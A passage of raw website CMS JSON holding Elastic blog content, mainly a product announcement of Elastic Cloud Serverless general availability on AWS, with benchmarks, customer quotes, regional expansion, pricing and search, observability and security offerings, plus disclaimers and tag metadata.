the critical components of GenAI applications across AI models, cloud infrastructure, MLOps frameworks, data prep and ingestion platforms, and AI security \u0026amp; operations.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThese \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/integrations\"\u003e\u003cspan style='font-size: 12pt;'\u003eintegrations\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e help developers:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDeliver more relevant experiences through RAG\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003ePrepare and ingest data from multiple sources\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eExperiment with and evaluate AI models\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLeverage GenAI development frameworks\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eObserve and securely deploy AI applications\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs43c6139598e71719"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csdc1393240cf3b9a7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003e\u003c/em\u003e\u003c/span\u003e\u003cem\u003eOriginally published on August 13, 2024; Updated December 17, 2024.\u003c/em\u003e\u003c/p\u003e\u003cp\u003e\u003cem\u003e\u003c/em\u003e\u003c/p\u003e\u003cp\u003e\u003cp\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/p\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs26749fc1600a2a40"}}}],"publish_date":"2024-12-17","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Beyond RAG Basics: Advanced strategies for AI applications","seo_description_l10n":"Explore advanced strategies for AI applications in retrieval augmented generation (RAG). Learn from experts on enhancing LLMs with effective data integration techniques.","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt38a3af2dfebcb772","ACL":{},"created_at":"2024-06-06T15:02:14.821Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"retrieval-augmented-generation-rag","label_l10n":"Retrieval augmented generation (RAG)","tags":[],"title":"Retrieval augmented generation (RAG)","updated_at":"2024-06-06T15:02:14.821Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-06-06T15:02:17.473Z","user":"blt3044324473ef223b70bc674c"}},{"_content_type_uid":"tags_topic","_version":2,"locale":"en-us","uid":"blt9085022a5c6c87e9","ACL":{},"created_at":"2023-11-06T20:41:57.778Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"large-language-models","label_l10n":"Large language models","tags":[],"title":"Large language models","updated_at":"2023-11-06T20:42:13.486Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:28.432Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blte429185b1884064a","_version":1,"title":"search-campaign-blog-banner-3_720x420.jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-16T21:29:00.712Z","updated_at":"2024-12-16T21:29:00.712Z","content_type":"image/jpeg","file_size":"77895","filename":"search-campaign-blog-banner-3_720x420.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-16T21:29:26.075Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte429185b1884064a/67609b9ccbd7d67d0315d1a1/search-campaign-blog-banner-3_720x420.jpg"},"title":"Beyond RAG basics: Advanced strategies for AI applications","title_l10n":"Beyond RAG basics: Advanced strategies for AI applications","updated_at":"2025-01-17T19:17:21.686Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/beyond-rag-basics","publish_details":{"time":"2025-01-17T19:17:26.537Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltebe8e6aae26ab934","_version":16,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic Cloud Serverless is the easiest way to start and scale your capabilities in search, observability and security. Built on a reimagined Elasticsearch architecture, it ensures low-latency querying across data without compromise on scalability.","author":["blt0896400660d3af74"],"category":["bltfaae4466058cc7d6"],"created_at":"2024-11-25T17:13:36.098Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csfcab443262d1470d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eToday, we are pleased to announce the general availability (GA) of Elastic Cloud Serverless on AWS. Elastic Cloud Serverless is the fastest way to start and scale security, observability, and search hassle-free. It’s powered by a re-architectured Elasticsearch that is built on an industry-first Search AI Lake optimized for real-time applications. It combines vast storage with low-latency querying and all of the strengths of Elasticsearch’s AI and search capabilities.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The Elasticsearch everyone loves, reimagined for the cloud","_metadata":{"uid":"cs0c9d915508067cea"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor over a decade, Elasticsearch has redefined search for complex, unstructured data — becoming a key pillar in the AI stack and the go-to solution to make data rapidly searchable at scale. Developers, SREs, and security analysts rely on Elasticsearch for its speed, scalability, and ability to analyze messy, evolving data sets. It runs a range of applications from log analytics to SIEM to AI-driven search. But as data volumes grow and workloads become more complex from retrieval augmented generation (RAG) to threat detection, applications demand even lower latency on ever-growing data sets.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch's new Search AI Lake architecture tackles this head-on with a reimagined stateless architecture. By decoupling compute from storage and indexing from search, the architecture scales seamlessly. What's crucial is that it uses cost-effective cloud-native object storage while retaining Elasticsearch’s fast, low-latency querying and AI relevance capabilities. Enhanced caching and parallelized query processing allow massive data handling with minimal lag, making real-time applications practical and performant. It delivers the storage capacity of a data lake with the responsiveness of Elasticsearch without operational overhead. No need to manage clusters or tune infrastructure — Elastic Cloud Serverless effortlessly handles scaling, storage, and speed automatically. With this architecture, Elasticsearch combines scalability, speed, and simplicity for next-generation, search-powered applications without scale or performance trade-offs.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd3acebd47adbb3fe"}}},{"quotes":{"quote_l10n":"What has stood out to our team with Elasticsearch Serverless is its ease of use. It’s simple to use as a fully managed service, and it takes virtually no time to set up a new project. We’ve also been impressed with how well Elastic delivers on its autoscaling capabilities.","_metadata":{"uid":"cs66d16b971dd85cac"},"quote_author_l10n":"Marcel Matus, Development Manager, SAP Concur","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs816501abf5dd1984"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eMany architectural features and innovations were developed to enable low-latency search, efficient data retention, and automatic scalability. For a deeper technical exploration, visit \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/category/elastic-cloud-serverless\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Search Labs\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Terabytes an hour gives results power","_metadata":{"uid":"cs083a46be4f8ef2d9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Cloud Serverless is engineered to tackle high-volume and high-performance workloads. \u003c/span\u003e\u003cspan style=\"color: rgb(22, 25, 31);font-size: 12pt;\"\u003eToday, serverless \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003escales to rapidly i\u003c/span\u003e\u003cspan style=\"color: rgb(51, 51, 51);font-size: 12pt;\"\u003engest and efficiently retain petabytes of data with \u003c/span\u003e\u003cspan style=\"color: rgb(22, 25, 31);font-size: 12pt;\"\u003efast indexing, search, and aggregation. \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOver the past six months since the public preview, thousands of active serverless projects have been provisioned and scaled with customers. \u003c/span\u003e\u003cspan style=\"color: rgb(22, 25, 31);font-size: 12pt;\"\u003eElastic Cloud Serverless recent performance benchmarks demonstrate rapid ingest, high scalability, and fast querying.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs13b7ee0f6cc6047d"}}},{"quotes":{"quote_l10n":"Setup is extremely easy. We provisioned a new project without needing technical expertise. Ingesting data and querying the cluster showed nearly zero latency.","_metadata":{"uid":"csf0aee5b5e78c3b24"},"quote_author_l10n":"Madison Bahmer, Senior Principal Enterprise Architect, Two Six Technologies","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csb65ce32916181049"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eRapidly and predictably ingest hundreds of terabytes a day:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e As a baseline given ~450K docs/s rate with 3,000 clients, a serverless project can ingest 7.5 terabytes of data per hour to a data stream or over 180 terabytes daily. Ingest rates can be accelerated and optimized further through additional settings. Unlike other platforms, where ingest rates tend to slow down as data volumes grow, Elastic Cloud Serverless provides consistent scaling in both data volume and ingestion speed — even as data sets continue to expand.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs59e0c1f065254c81"}}},{"image":{"image":{"uid":"blta45d317e71491ee6","_version":1,"title":"image1.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-25T17:14:35.609Z","updated_at":"2024-11-25T17:14:35.609Z","content_type":"image/png","file_size":"168376","filename":"image1.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-02T12:29:38.610Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta45d317e71491ee6/6744b07b4b0ed11a62e1bf16/image1.png"},"_metadata":{"uid":"csbcfd6bba5dc22387"},"caption_l10n":"","alt_text_l10n":"Rapidly and predictably ingest hundreds of terabytes a day","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs6cc6d36b04e60dc9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eThe flexibility to be fast, high concurrency querying at scale: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eServerless delivers stable and fast query response time. Executing over 3,000 concurrent complex aggregations and queries on 5 terabytes of data delivered consistently low-milliseconds response times.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003c/p\u003e\u003ctable\u003e\u003ctbody\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eActual volume\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eDuration\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eAverage search rate (req/s)\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eMax search rate (req/s)\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eResponse time (P50)\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eResponse time (P99)\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eLoad handling search pods\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003ePod memory\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e5.84 TB\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e120 minutes\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e891\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e3,158\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e36 ms\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e316 ms\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e24\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e1.2 TB\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003c/tbody\u003e\u003c/table\u003e\u003cp\u003e\u003cbr /\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/serverless-performance-testing\"\u003e\u003cspan style='font-size: 12pt;'\u003eExplore more details into these and other benchmarks\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Hassle-free operations: The simplest way to start and grow","_metadata":{"uid":"csf8b75f8cb7b32513"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(22, 25, 31);font-size: 12pt;\"\u003eElastic Cloud Serverless is designed from the ground up to be the easiest way to start and scale with a simplified user experience.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(22, 25, 31);font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003eNo nodes, no shards, no stress:\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(22, 25, 31);font-size: 12pt;\"\u003e\u003cem\u003e \u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(22, 25, 31);font-size: 12pt;\"\u003eNo need to manage backend infrastructure, do capacity planning, upgrade, or scale data.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(22, 25, 31);font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003eFast configuration:\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(22, 25, 31);font-size: 12pt;\"\u003e\u003cem\u003e \u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(22, 25, 31);font-size: 12pt;\"\u003eStart a new fully configured serverless project in a snap.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(22, 25, 31);font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003eGuided onboarding: \u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(22, 25, 31);font-size: 12pt;\"\u003eGet a step-by-step process that guides you with in-product resources and tools to get results faster and skip the learning curve.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"color: rgb(22, 25, 31);font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003eProject-based:\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(22, 25, 31);font-size: 12pt;\"\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(22, 25, 31);font-size: 12pt;\"\u003eExplore a new product experience to easily create projects optimized to the unique needs of each use case.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"csbaf8004e30f910a1"}}},{"banner":{"reference":[{"uid":"blt8832b7dff87aef1d","_content_type_uid":"banner"}],"_metadata":{"uid":"cs327aea1c00468a18"}}},{"title_text":{"title_text":[{"title_l10n":"Growing global coverage with AWS regions and upcoming Azure and Google Cloud instances","_metadata":{"uid":"cs9237c648e493fabc"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe are pleased to announce broader geographical availability expanding support for multiple AWS regions from AWS US-East-1 (N. Virginia) to include AWS EU-West-1 (Ireland), AWS AP-Southeast-1 (Singapore), and AWS US-West-2 (Oregon). These regions allow you to run workloads closer to end users, reducing latency and improving overall performance — particularly for search and observability applications. We will continually expand regional support, delivering the flexibility to deploy workloads that meet regional data residency requirements, improve response times, and ensure compliance for data localization.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe are also excited to announce upcoming support for Azure instances. This opens Elastic Cloud Serverless to Microsoft's growing cloud ecosystem for seamless integration with Azure services like Blob Storage, Event Hubs, and Azure Active Directory among many others to streamline workflows. Users can benefit from built-in, enterprise-grade security features to encrypt, secure, and stay compliant while using Azure's global infrastructure. Support for Google Cloud instances will also be available early 2025. Elastic Cloud Serverless multi-cloud strategy will continue to expand flexibility in choosing the best cloud provider based on your requirements and existing cloud deployments.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe also believe in transparency with Elastic engineering by sharing an ambitious roadmap for Elastic Cloud Serverless development. We’ve created a new \u003c/span\u003e\u003ca href=\"https://www.elastic.co/cloud/serverless/roadmap\"\u003e\u003cspan style='font-size: 12pt;'\u003eroadmap page\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e that helps you keep track and see plans for both short- and long-term development.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Streamlined solutions that start fast and search faster","_metadata":{"uid":"cs497a8437ae2bec9c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud Serverless offers both streamlined solutions and pricing. The new \u003c/span\u003e\u003ca href=\"https://www.elastic.co/pricing/serverless-search\"\u003e\u003cspan style='font-size: 12pt;'\u003esolution-specific pricing\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e aligns costs with actual usage tailored to the different needs of security, observability, and search — offering greater flexibility and predictability. This means pricing for log analytics or security events is based on the volume of data ingested and retained, whereas search applications depend on the amount of compute power and storage that is used.\u003c/span\u003e\u003cspan style='color:rgb(68, 71, 70);font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eBy focusing on resource-based metrics like data ingestion, storage, and compute units, Elastic makes it easier for customers to manage budgets and scale as needed — enabling more control to manage workloads across different applications.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe’re also happy to introduce new volume pricing for security and observability data, using a tiered pricing model. This approach simplifies scaling by reducing costs per unit as data usage increases. Pricing decreases with higher data volumes and is divided into tiers based on data ingested and retained.\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e \u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eFor instance, the first 10 terabytes (TB) of data retention is priced higher per terabyte than the next 10 TB with lower pricing for volumes exceeding 20 TB.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIt's also easy to get started with optimized serverless experiences for search, observability, and security.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Elasticsearch Serverless","_metadata":{"uid":"cs996682a41d3d91b9"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElasticsearch Serverless\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003elets developers rapidly build AI-powered search applications with the latest features, save time managing infrastructure, and scale up or down to meet their needs. With optimized instances you can quickly build generative AI (GenAI) applications using both lexical and semantic search that are guided by inline documentation and code samples. Cluster management, scaling, and configurations are all automated and transparent. Users can accelerate development of GenAI applications with access to Elasticsearch’s latest AI capabilities, like vector search and Better Binary Quantization (BBQ), and streamline inference using various built-in or custom models. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/elasticsearch-serverless-now-ga\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eRead more\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to dive deep into Elasticsearch Serverless.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Elastic Observability Serverless","_metadata":{"uid":"cs185ec6c95e74a072"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Observability Serverless enables a hassle-free experience without the overhead of managing the Elastic Stack or manually scaling capacity. Streamlined workflows, guided onboarding, and out-of-the-box dashboards and analysis minimize time to insight with crucial context. With over 350+ integrations and an OpenTelemetry-first approach, getting your observability data into Elastic is simpler than ever before. Store both short- and long-term data efficiently without the need for rehydration or data moving across data tiers. This allows quicker than ever analytics with fast queries, RAG-based AI analysis, and machine learning jobs that deliver insights in minutes even on petabytes of data. Analyze all your business and operational data to detect issues proactively, accelerate problem resolution, and deliver on business outcomes. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-observability-serverless\" target=\"_self\"\u003e\u003cspan style='font-size: 12pt;'\u003eRead more\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to dive deep into Elastic Observability Serverless.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Elastic Security Serverless","_metadata":{"uid":"csff9daf452372d53f"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Security Serverless provides security analysts with a new cloud deployment option for their security analytics and SIEM use cases. This new and fully managed cloud offering delivers a curated security solution that can be put to work quickly. Using Elastic Security Serverless eliminates the overhead of managing cloud and SIEM infrastructure and allows security teams to focus on protecting, investigating, and responding to threats within their organizations. The Search AI Lake architecture offers efficient and fast storage for both short- and long-term data without rehydration or data moving across data tiers. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-security-on-cloud-serverless\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eRead more\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to dive deep into Elastic Security Serverless.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Explore all the power of search and AI, hassle-free","_metadata":{"uid":"cs6f91c320bc810544"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe future of search, security, and observability is here without compromise on speed, scale, or spend. Elastic invites security analysts, SREs, and developers to experience serverless. Learn more about the possibilities of \u003c/span\u003e\u003ca href=\"/cloud/serverless\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eserverless\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, or start your \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/serverless-registration\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003efree trial now\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs42f172f136aa73a1"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs0ca3bca17299e801"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective 